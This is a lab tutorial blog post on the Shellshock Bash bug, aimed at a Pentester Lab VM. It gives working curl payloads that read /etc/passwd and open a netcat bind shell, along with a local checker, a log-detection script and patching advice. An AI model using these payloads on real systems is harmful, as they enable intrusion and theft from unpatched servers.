metalkey

Hacking tutorials + info

Shellshock Explained + Exploitation Tutorial

July 02, 2016 — metalkey

Introduction

Shellshock (CVE-2014-6271) is a code injection vulnerability in GNU Bash that is present in every release up to and including the unpatched 4.3.
It is caused by the way Bash imports function definitions from environment variables: a variable whose value starts with '() {' is parsed as a function, and an unpatched Bash keeps parsing past the closing brace and executes whatever commands follow it, before the Bash process gets to the work it was started for. Patched builds (Bash 4.3 patch 25 and later, and the vendor backports to older branches) stop at the end of the function body; the follow-up patches also moved exported functions into a separate 'BASH_FUNC_name%%' namespace so that an ordinary variable is never treated as a function at all.

Testing

To test if your system is vulnerable, run the command below in a Bash shell. 'env' sets the variable 'x' for the child 'bash' process only, so the shell you type it into is unaffected.

user@debian8:~$ env x='() { :;}; echo vulnerable' bash -c "echo not-vulnerable"

If 'vulnerable' is echoed back, your system is vulnerable: the child bash imported 'x' as a function and executed the 'echo vulnerable' that trails the function body '() { :;};' before it ran its own '-c' command.
A response of only 'not-vulnerable' (a patched Bash may print a warning first that the function definition attempt was ignored) indicates your system is not vulnerable to this particular test.
Note: This test only covers the original bug. The first fix was incomplete, and the follow-on parser bugs (CVE-2014-7169 and later) have their own tests, so additional tests should be performed to confirm your system is fully patched.
These tests can be found on the Shellshocker website - https://shellshocker.net/

Exploitation

Launch the 'Pentester Lab: CVE-2014-6271 Shellshock' VM (https://pentesterlab.com/exercises/cve-2014-6271) then browse to the VM’s IP in your web-browser.
You will be presented with the output of the 'uptime' and 'uname -a' Linux commands, running on the Pentesterlab VM.

CVE-2014-6271
This system is running:
uptime: 20:44:15 up 0 min, 1 users, load average: 0.06, 0.01, 0.00
kernel: Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux

View the page source and you’ll notice the location of the CGI (http://www.techrepublic.com/article/cgi-crash-course-how-to-run-cgi-scripts/) script that is executed on the server.

$.getJSON("/cgi-bin/status", function (data) {

The status script is run by Bash, and the web server hands every request header to the CGI script as an environment variable (User-Agent becomes HTTP_USER_AGENT), so a User-Agent that begins with '() {' is parsed as a function definition and the commands after it run before the script itself does. Let's use curl to launch a few shellshock attacks against the status CGI script via the User-Agent string (-A in curl). Each payload starts with 'echo "Content-Type: text/plain"; echo' so that the injected command's output is preceded by a valid CGI header block and the blank line that terminates it; without that preamble the web server treats the output as malformed headers and returns a 500 error instead of the command output.

Passwd File

user@debian8:~$ curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/cat /etc/passwd' http://192.168.1.14/cgi-bin/status > passwd

user@debian8:~$ cat passwd
root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh

Directory Listing

user@debian8:~$ curl -A '() { :;}; echo "Content-Type: text/plain"; echo; /bin/ls /' http://192.168.1.14/cgi-bin/status
bin
boot
dev
etc
home
init
...
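The two curl attacks above depend on the chain web server -> HTTP_* environment variable -> Bash. The script below, an added example that is not part of the original tutorial or of the Pentester Lab exercise, reproduces that chain offline: it writes a stand-in for the status script into a temporary directory, sets HTTP_USER_AGENT to the same shape of payload the curl commands send, and runs the script under a Bash binary of your choosing, so it doubles as a local version of the test from the Testing section. A second function checks for the 'BASH_FUNC_name%%' export namespace that the later Shellshock patches introduced, which the plain test cannot distinguish from the first, incomplete fix. The function names, the marker string and the stand-in script are this example's own.

```shell
#!/bin/sh
# Added example, not from the original tutorial: emulate the CGI path
# (request header -> HTTP_* environment variable -> Bash) locally and
# report whether a given Bash binary executes the trailing command.
# No network is involved; the "server" is a temporary directory.

# Build the same payload shape the curl -A examples use: a function
# definition, the CGI header preamble (so a real web server would
# accept the output), then the injected command.  $1 = command.
shellshock_payload() {
    printf '() { :;}; echo "Content-Type: text/plain"; echo; %s' "$1"
}

# Emulate a request to a Bash-based CGI script whose User-Agent carries
# the payload.  $1 = Bash binary to test (name or path).
# Prints "vulnerable", "not-vulnerable" or "bash-not-found".
cgi_shellshock_check() {
    bash_path=$(command -v "$1" 2>/dev/null) || { echo bash-not-found; return 2; }
    tmp=$(mktemp -d) || { echo bash-not-found; return 2; }
    # Stand-in for /cgi-bin/status (constructed; not the Pentester Lab script).
    cat > "$tmp/status" <<EOF
#!$bash_path
echo "Content-Type: text/plain"
echo
echo "kernel: \$(uname -a)"
EOF
    chmod +x "$tmp/status"
    # A marker that legitimate script output never contains; if it
    # shows up, the command after the function body was executed.
    marker="SHELLSHOCK_MARKER_$$"
    # mod_cgi would export User-Agent as HTTP_USER_AGENT and exec the
    # script via its shebang; the interpreter is run explicitly here so
    # the check also works where the temp directory is mounted noexec.
    out=$(HTTP_USER_AGENT="$(shellshock_payload "echo $marker")" \
          "$bash_path" "$tmp/status" 2>/dev/null)
    rm -rf "$tmp"
    case "$out" in
        *"$marker"*) echo vulnerable;     return 1 ;;
        *)           echo not-vulnerable; return 0 ;;
    esac
}

# Patched Bash (4.3 patch 27 and later, plus vendor backports) exports
# functions under the BASH_FUNC_<name>%% namespace rather than as a
# plain variable, so an ordinary variable can no longer be mistaken for
# a function.  The plain test cannot tell a partially patched build
# from a fully patched one; this check can.  $1 = Bash binary.
# Prints "namespaced", "plain" or "bash-not-found".
bash_function_export_namespaced() {
    bash_path=$(command -v "$1" 2>/dev/null) || { echo bash-not-found; return 2; }
    if "$bash_path" -c 'f() { :; }; export -f f; env' 2>/dev/null | grep -q '^BASH_FUNC_f%%='; then
        echo namespaced; return 0
    fi
    echo plain; return 1
}

# Run against the Bash found in PATH, or the binary named on the command line.
cgi_shellshock_check "${1:-bash}"
bash_function_export_namespaced "${1:-bash}"
```

Run it as 'sh check.sh /path/to/bash' to test a specific build; on a vulnerable build the first line reads 'vulnerable' and the second 'plain', on a current build 'not-vulnerable' and 'namespaced'. Because every CGI request starts a fresh Bash process, upgrading the binary fixes the CGI vector immediately, without restarting the web server.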

Bind Shell

Bind an instance of Bash to a netcat listener on port 2345 on the VM, then connect to it.
The curl request does not return until the listener exits, because the CGI script is stuck behind it, so run the curl command in one terminal and connect from a second terminal with 'nc -vn 192.168.1.14 2345'. This relies on the target's netcat supporting '-e' (traditional netcat and nmap's ncat do; the OpenBSD netcat shipped by many distributions does not) and on nothing filtering inbound connections to port 2345; where either fails, a reverse shell back to your own host is the usual alternative. No Content-Type preamble is needed in this payload because the shell's output travels over the netcat connection rather than the HTTP response.

user@debian8:~$ curl -A '() { :; }; /bin/bash -c "/usr/bin/nc -lvvp 2345 -e /bin/bash"' http://192.168.1.14/cgi-bin/status

user@debian8:~$ nc -vn 192.168.1.14 2345
(UNKNOWN) [192.168.1.14] 2345 (?) open

whoami
pentesterlab

/sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:84:1F:23
inet addr:192.168.1.14 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe84:1f23/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:742 errors:0 dropped:0 overruns:0 frame:0
TX packets:426 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:57418 (56.0 KiB) TX bytes:246492 (240.7 KiB)
Interrupt:10 Base address:0xd020
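From the defender's side, the same '() {' fingerprint that makes these requests work makes them easy to find in web server logs, as long as the payload travels in a header the server logs (User-Agent and Referer in the common combined format; a payload sent in Cookie or a custom header needs a WAF or IDS that inspects the full request, and that is the pattern their Shellshock signatures match on). The script below is an added example, not part of the original tutorial; the log lines are constructed for it, the addresses come from documentation ranges, and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original tutorial: hunt for Shellshock
# attempts, like the curl -A requests above, in a web server access
# log.  The sample log is constructed for this example.

# The attack fingerprint is the start of an exported function
# definition, "() {", in any logged request header.  Optional
# whitespace is allowed so "(){", "() {" and "()  {" all match.
SHELLSHOCK_RE='\(\)[[:space:]]*[{]'

# Print every log line carrying the pattern.  $1 = log file.
find_shellshock_attempts() {
    grep -E "$SHELLSHOCK_RE" "$1"
}

# Count the attempts; prints 0 when none are present.
count_shellshock_attempts() {
    grep -Ec "$SHELLSHOCK_RE" "$1"
}

# List the source IPs that sent them (combined log format: IP is field 1).
shellshock_sources() {
    grep -E "$SHELLSHOCK_RE" "$1" | awk '{print $1}' | sort -u
}

# Constructed sample in Apache combined log format: two injection
# attempts against /cgi-bin/status from one host (one via User-Agent,
# one via Referer) and two ordinary requests.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [02/Jul/2016:20:44:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo \"Content-Type: text/plain\"; echo; /bin/cat /etc/passwd"
198.51.100.7 - - [02/Jul/2016:20:44:16 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.10 - - [02/Jul/2016:20:44:17 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "() { :; }; /bin/bash -c \"/usr/bin/nc -lvvp 2345 -e /bin/bash\"" "curl/7.38.0"
203.0.113.5 - - [02/Jul/2016:20:44:18 +0000] "GET /cgi-bin/status HTTP/1.1" 200 120 "-" "curl/7.38.0"
EOF

find_shellshock_attempts "$SAMPLE_LOG"
echo "attempts: $(count_shellshock_attempts "$SAMPLE_LOG")"
echo "sources:  $(shellshock_sources "$SAMPLE_LOG" | tr '\n' ' ')"
```

Point the functions at the real file (for Apache on Debian, /var/log/apache2/access.log) instead of the sample. A 200 response on a matching line is not proof of success on its own, since the CGI script returns 200 whether or not the injected command ran; the response size and the script's own output are the useful follow-up indicators.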

Conclusion

The examples above demonstrate a tiny fraction of what is possible using the Shellshock vulnerability.

Additional attack vectors include any service that places attacker-controlled data into the environment of a Bash process:
– OpenSSH server (with a key restricted by 'command=' or a 'ForceCommand' setting, the client's requested command is exported as SSH_ORIGINAL_COMMAND, turning a deliberately limited account into a full shell)
– DHCP clients (dhclient exports options received from a rogue DHCP server into the environment of its hook scripts)
– Qmail server (envelope data such as the sender address is exported into the environment of delivery commands run from .qmail files)
– IBM HMC restricted shell

If your system is vulnerable, patch it immediately by upgrading Bash to a build that carries the full set of Shellshock fixes (the original CVE-2014-6271 patch alone was incomplete; CVE-2014-7169 and the later CVEs covered the remaining parser bugs), then re-run the tests. A host with no CGI scripts is still exposed through the other vectors above, so do not limit the upgrade to web servers.

Tags: shellshock